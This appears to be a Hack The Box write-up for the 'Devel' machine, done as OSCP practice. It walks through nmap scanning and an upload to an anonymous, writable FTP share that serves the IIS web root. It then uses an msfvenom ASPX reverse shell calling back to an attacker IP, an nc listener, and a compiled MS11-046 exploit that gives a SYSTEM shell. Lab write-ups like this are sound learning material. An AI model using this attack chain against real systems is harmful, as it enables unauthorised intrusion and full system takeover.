Hack The Box — Devel — without Metasploit (TJNull’s list for OSCP)
This is my 25th write-up for Devel, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -oA nmap/initial devel.htb- -oA is used to save outputs (in this case in nmap directory as initial)
- -sC is for default scripts
- -sV is to enumerate versions
- -O is for OS enumeration
So, we have FTp running on port 21 and HTTP running on port 80. We have anonymous login allowed on Target’s FTP. Also, Nmap lists the contents of the FTP server which shows iisstart.htm, welcome.png and a directory aspnet_client.
Let’s get on to the HTTP server and see what we have on it.
We have IIS7 default page. If we look into the source of the web page. We can see
We can see that the image welcome.png is included without any full path. Which means that the image is in the same directory where the web page is hosted. And we also noticed the image welcome.png in our FTP server. So, let’s login to FTP and try putting any files there if we have the write access and see if we can access those files from the web server.
I am gonna create a test file and put it in FTP then try accessing it from the web server.
echo "Hello DaemonExala" > test.txt
ftp devel.htb
Now, let’s see if I can access it on the web.
And I can. Let’s simply generate an ASPx shell and upload it on the web server. This way we can get a reverse shell probably.
Initial Foothold
Let’s generate an ASPX reverse shell using MSFVENOM.
msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.32" LPORT=4242 -f aspx > shell.aspx
Let’s upload it from FTP.
Let’s start a listener on port that we used to generate the reverse shell.
rlwrap nc -lvnp 4242
Let’s navigate to http://devel.htb/shell.aspx to get a reverse shell.
And we got a reverse shell.
Privilege Escalation
Let’s see what user shell we have currently.
whoami
Right now, we are the default user for IIS. We may have very limited rights on the machine. Let’s enumerate the machine from within to get better insight. First, let’s see systeminfo.
systeminfo
We can see that it’s a Windows 7 Enterprise, build 6.1.7600.
Let’s see if we have any privilege escalation exploits for this version. By a simple Google search I got this exploit:
https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c
By looking at the code, it also guides us in the comments on how to compile it.
I saved this code as file priv.c so I will be replacing the file name obviously.
i686-w64-mingw32-gcc priv.c -o priv.exe -lws2_32
It compiled without any errors, let’s upload the exe through the FTP, since we have the write permissions.
It’s always better to enable the binary mode in FTP when you transfer an executable binary file.
Now, let’s navigate to the FTP directory from our reverse shell and run it.
We have the inetpub directory in the root of C drive. It’s usually the default directory when you setup a web server. And since, we know that web server and FTP server share the same directory, so our uploaded exploit should be in there.
Inside inetpub we have wwwroot , again the default directory.
Inside wwwroot we can see our uploaded binary exploit.
Let’s run it.
priv.exe
And we got an NT AUTHORITY\SYSTEM (root) shell.
EZ :)
